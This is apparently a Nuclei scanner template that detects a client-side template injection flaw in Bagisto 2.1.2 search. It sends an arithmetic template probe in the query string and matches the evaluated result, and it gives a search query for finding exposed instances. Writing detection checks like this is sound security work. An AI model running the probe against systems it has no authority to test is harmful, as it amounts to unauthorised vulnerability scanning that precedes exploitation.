id: bagisto-csti info: name: Bagisto 2.1.2 Client-Side Template Injection author: securityforeveryone severity: medium description: | Bagisto is vulnerable to Client-Side Template Injection (CSTI), which allows an attacker to execute arbitrary code on the server. reference: - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html - https://demo.bagisto.com/ classification: cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: webkul product: bagisto fofa-query: "Bagisto" tags: bagisto,csti,packetstorm,ssti http: - method: GET path: - "{{BaseURL}}/bagisto-common/search?query={{228*'98'}}" matchers-condition: and matchers: - type: word part: body words: - "22344" - "bagisto" condition: and - type: word part: content_type words: - "text/html" # digest: 4a0a00473045022100fd3151dd775768eaccd9353eda9e2f15c07ce2592c2f77afb905cc56ea226db302203f1bbe8e3c106b49b67948050daff4d521ff503f26eaabe7c897205c62a8b3a4:922c64590222798bb761d5b6d8e72950